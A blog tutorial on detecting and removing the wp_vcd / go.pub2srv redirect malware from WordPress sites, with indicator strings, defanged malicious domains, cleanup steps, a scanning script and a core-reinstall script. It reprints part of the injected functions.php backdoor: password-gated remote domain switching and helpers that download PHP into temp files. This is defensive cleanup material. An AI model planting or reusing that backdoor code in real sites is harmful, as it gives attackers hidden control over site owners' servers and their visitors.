Best Way To Remove Go.pub2srv Malware from your WordPress Site

Is your WordPress website infected with JavaScript redirect malware? This ad malware randomly redirects the site or the visitor's browser to an ad link or external website. The infection sends your visitors to malicious domains such as go.pub2srv[.]com, go.mobisla[.]com and go.oclaserver[.]com.

Here I've provided you with a tutorial on what this malware is all about, what causes this and how to fix this. So stay cool, grab a cup of coffee and continue reading...


What is Go.pub2srv Malware?

It is malware that redirects visitors to spammy websites carrying advertisements, porn or phishing pages. On mobile devices it shows intrusive pop-up messages instead of, or in addition to, the redirect.

What Causes this Go.pub2srv Malware?

In most cases the site was hacked through a vulnerability, or the owner downloaded themes/plugins from an unsafe website (nulled or pirated copies) and installed them.

So it is always advisable to scan any theme or plugin you download from a third-party website (anything outside the wordpress.org directory) on VirusTotal before installing it, and to prefer the wordpress.org directory or the vendor's own site in the first place.

Consequences of the Hack

The Astra write-up credited below attributes this campaign to SQL injection (SQLi) vulnerabilities. Where that is how the attacker got in, they can:

Add, delete, edit or read content in the database

Read files on the database server

Write files to the database server

Steal user records and password hashes from your WordPress/OpenCart site

Steal transaction information from your OpenCart/WooCommerce store

Plant SEO spam on your domain, which gets it blacklisted in Google Webmasters (Search Console)

Credits: getastra.com
 

How To Remove this Go.pub2srv Malware Code on WordPress?

Before removing the code you should know where it is found in your WordPress files. The injected code turns up in the following places:

index.php

functions.php (of the active theme)

Database tables

The first steps in removing go.pub2srv malware from your site are:

Take a backup of your WordPress files (or zip the entire folder) so you can restore them if anything goes wrong.

Change your passwords (WordPress admin, database and hosting/FTP) after carrying out the steps below, so the attacker can no longer get in. Note that the injected code shown below carries its own hardcoded password, so changing your credentials does nothing while that code is still in place.

Go to your themes directory and delete all unused themes.

Remove all plugins downloaded from unknown sources.

In your active theme, open functions.php and remove the unfamiliar block the malware prepended at the top of the file (the theme's own code begins after it). Below is a sample of the injected code, reproduced as far as the original post shows it.

Code:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f6efce15ddb7aa5764e90dffbfd5cfdc')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code5.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle = fopen($tmpfname, "w+");
            fwrite($handle, "

(The sample is cut off at this point in the original post.)

Two things to notice in the sample. The first block is a remote-control backdoor: a request carrying action=change_domain, the hardcoded password and a newdomain parameter rewrites, inside this very file, the hostname from which code5.php is fetched, so the attacker can move the redirect to a new domain without touching the server again. The second block defines file_get_contents_tcurl(), a cURL download helper that follows redirects, and theme_temp_setup(), which writes downloaded PHP into a temporary file; requests to wp-cron.php and xmlrpc.php are skipped. Any theme whose functions.php starts with $div_code_name = "wp_vcd" is infected.
After modifying, click Save.

In the wp-includes directory, delete the files wp-vcd.php, class.wp.php and wp-tmp.php.

In the wp-includes directory, open post.php and delete the extra PHP block the malware prepended at the top of the file. If you are unsure which lines are foreign, compare the file with post.php from a clean WordPress download of the same version.
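The cleanup steps above are typed into a shell on the host, so here is the same triage as an added shell script. This is an added example, not code from the original post or from any of the scanners linked below. It assumes the indicator strings taken from the injected functions.php sample above (wp_vcd, theme_temp_setup, file_get_contents_tcurl, code5.php, WP_V_CD) and the three dropped file names from the cleanup steps; the scan_wp_vcd, backup_site and make_demo_site names and the small site tree make_demo_site builds are constructed for this demonstration.

```shell
#!/bin/sh
# wp-vcd triage helper. Added example for this post; not code from the post or
# from any linked service. Assumptions: the indicator strings come from the
# injected functions.php sample shown above, and the dropped file names are the
# three listed in the cleanup steps.

# Strings that appear in the injected code (extended regex alternation).
WPVCD_PATTERNS='wp_vcd|theme_temp_setup|file_get_contents_tcurl|code5\.php|WP_V_CD'
# Files the malware drops into wp-includes.
WPVCD_DROPPED='wp-vcd.php wp-tmp.php class.wp.php'

# Step 1 of the cleanup: archive the whole site before touching anything.
#   backup_site /var/www/html /root/site-before-cleanup.tgz
backup_site() {
    tar -czf "$2" -C "$(dirname "$1")" "$(basename "$1")"
}

# Report dropped files and every PHP file containing an indicator string.
# Prints one finding per line; exit status 0 = nothing found, 1 = findings.
scan_wp_vcd() {
    root=$1
    hits=0
    for f in $WPVCD_DROPPED; do
        if [ -f "$root/wp-includes/$f" ]; then
            printf 'dropped-file: %s\n' "$root/wp-includes/$f"
            hits=$((hits + 1))
        fi
    done
    # grep -l prints each matching path once; this covers the themes'
    # functions.php, wp-includes/post.php, index.php and anything else touched.
    matches=$(find "$root" -type f -name '*.php' -exec grep -lE "$WPVCD_PATTERNS" {} + 2>/dev/null | sort)
    if [ -n "$matches" ]; then
        printf '%s\n' "$matches" | sed 's/^/indicator: /'
        hits=$((hits + $(printf '%s\n' "$matches" | wc -l)))
    fi
    printf 'total findings: %s\n' "$hits"
    [ "$hits" -eq 0 ]
}

# Constructed sample: a minimal site tree with the infection pattern the post
# describes (block prepended to the theme's functions.php, loaders dropped into
# wp-includes). Prints the directory it created.
make_demo_site() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-includes" "$d/wp-content/themes/twentyseventeen"
    printf '<?php\nrequire __DIR__ . "/wp-blog-header.php";\n' > "$d/index.php"
    printf '<?php\n$div_code_name = "wp_vcd";\n?><?php\n// theme code follows\n' \
        > "$d/wp-content/themes/twentyseventeen/functions.php"
    printf '<?php\n// clean core file\n' > "$d/wp-includes/post.php"
    printf '<?php\n// dropped loader\n' > "$d/wp-includes/wp-vcd.php"
    printf '<?php\n// dropped loader\n' > "$d/wp-includes/class.wp.php"
    printf '%s\n' "$d"
}

# Usage: sh wpvcd-scan.sh /var/www/html   (no argument runs the constructed demo)
if [ $# -ge 1 ]; then
    scan_wp_vcd "$1"
    exit $?
else
    demo=$(make_demo_site)
    if scan_wp_vcd "$demo"; then echo "demo tree is clean"; else echo "demo tree is infected"; fi
    rm -rf "$demo"
fi
```

Run it against the web root before and after the cleanup: a clean tree exits 0 and prints "total findings: 0". A hit in a file you have not listed here (a plugin, an uploads directory) means the infection spread further than the three locations above and that file needs the same manual inspection.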

FAQ

If I delete class.wp.php, WordPress crashes.

What exactly is deleted in post.php? I couldn't find any difference compared to an original post.php file.

Both questions have the same answer: replace the core files instead of editing them. Download a fresh copy of WordPress (the version your site runs, or the latest if you intend to upgrade), then delete the wp-includes and wp-admin folders and every file in public_html except the wp-content folder, the .htaccess file and wp-config.php.

Then copy the freshly downloaded wp-admin, wp-includes and top-level files into place. The crash after deleting class.wp.php is typically because the line the malware added to wp-includes/post.php still loads that file; a clean post.php removes the reference along with anything else that was modified.
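The FAQ answer above is a core reinstall, so here it is as an added shell script (an added example, not code from the original post). It assumes you have already downloaded and unpacked a clean WordPress into a directory, so nothing is fetched from the network; the reinstall_core, make_infected_site and make_fresh_core names and the two sample trees they build are constructed for this demonstration. Note what it deliberately does not do: wp-content, wp-config.php and .htaccess are kept exactly as the FAQ instructs, so the theme's functions.php still has to be cleaned by hand as in the steps above, and the two kept files should be read through for lines you did not put there.

```shell
#!/bin/sh
# Core reinstall as described in the FAQ answer. Added example, not code from
# the post. Assumption: $2 is a directory holding a freshly downloaded and
# unpacked WordPress (the "wordpress" folder from the wordpress.org zip).

# Replace wp-admin, wp-includes and the top-level files of $1 with the copies in
# $2, keeping wp-content, wp-config.php and .htaccess as the FAQ says.
reinstall_core() {
    root=$1
    core=$2
    # Refuse to run against something that is not a WordPress root, or with a
    # "fresh" tree that is not WordPress: the lines after this delete files.
    [ -f "$root/wp-config.php" ] || { echo "no wp-config.php in $root" >&2; return 1; }
    [ -f "$core/wp-includes/version.php" ] || { echo "$core is not an unpacked WordPress" >&2; return 1; }

    rm -rf "$root/wp-admin" "$root/wp-includes"
    # Top-level files only; wp-content is a directory and is left alone.
    for f in "$root"/* "$root"/.[!.]*; do
        [ -f "$f" ] || continue
        case $(basename "$f") in
            wp-config.php|.htaccess) ;;
            *) rm -f "$f" ;;
        esac
    done
    # Copy in the clean core, skipping the fresh wp-content so your themes,
    # plugins and uploads stay in place.
    for f in "$core"/* "$core"/.[!.]*; do
        [ -e "$f" ] || continue
        if [ "$(basename "$f")" = wp-content ]; then continue; fi
        cp -R "$f" "$root/"
    done
}

# Constructed sample: an infected site with a dropped loader, a prepended block
# in post.php, an attacker file in wp-admin and real content under wp-content.
make_infected_site() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-admin" "$d/wp-includes" "$d/wp-content/themes/twentyseventeen" "$d/wp-content/uploads"
    printf '<?php\n// original index\n' > "$d/index.php"
    printf '<?php\n// attacker drop\n' > "$d/hacked.php"
    printf '<?php\ndefine("DB_NAME", "wp");\n' > "$d/wp-config.php"
    printf 'RewriteEngine On\n' > "$d/.htaccess"
    printf '<?php\n// admin backdoor\n' > "$d/wp-admin/evil.php"
    printf '<?php\n// dropped loader\n' > "$d/wp-includes/wp-vcd.php"
    printf '<?php\n// prepended by malware\n?><?php\n// original post.php\n' > "$d/wp-includes/post.php"
    printf '<?php\n$div_code_name = "wp_vcd";\n' > "$d/wp-content/themes/twentyseventeen/functions.php"
    printf 'jpeg' > "$d/wp-content/uploads/photo.jpg"
    printf '%s\n' "$d"
}

# Constructed sample: the shape of a freshly unpacked WordPress.
make_fresh_core() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-admin" "$d/wp-includes" "$d/wp-content"
    printf '<?php\n// clean core index\n' > "$d/index.php"
    printf '<?php\n// clean core admin\n' > "$d/wp-admin/index.php"
    printf '<?php\n$wp_version = "x.y.z";\n' > "$d/wp-includes/version.php"
    printf '<?php\n// clean core post.php\n' > "$d/wp-includes/post.php"
    printf '<?php\n// Silence is golden.\n' > "$d/wp-content/index.php"
    printf '%s\n' "$d"
}

# Usage: sh reinstall.sh /path/to/public_html /path/to/wordpress
# With no arguments it runs the reinstall on the constructed trees and lists
# what survived.
if [ $# -eq 2 ]; then
    reinstall_core "$1" "$2"
    exit $?
else
    site=$(make_infected_site)
    fresh=$(make_fresh_core)
    if reinstall_core "$site" "$fresh"; then
        find "$site" -type f | sort
    fi
    rm -rf "$site" "$fresh"
fi
```

Run it only after the backup step, and run the scan from the cleanup section again afterwards: the reinstall clears wp-admin, wp-includes and the root files, but the theme's functions.php under wp-content is untouched by design and still has to be cleaned by hand.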
 

Useful Links & Credits

Services:

https://quttera.com

https://sitecheck.sucuri.net/

https://wordpress.org/plugins/sucuri-scanner/

http://sucuri.net/malware/entry/MW:BLK:2

http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1

Resources:

https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/

https://toster.ru/q/482218

https://pastebin.com/bzcCHnT3

https://wordpress.org/support/topic/mwjsgen2rogueads-unwanted_ads-1-2/

https://www.upwork.com/job/prevent-SQL-injection-PHP-hardening-wordpress-stop-website-hacks_~013dcf70c6f4637ad3/

https://fixmywp.com/blog/detect-clean-wordpress-malware-redirect.php

https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting

Thanks, and Stay Safe! 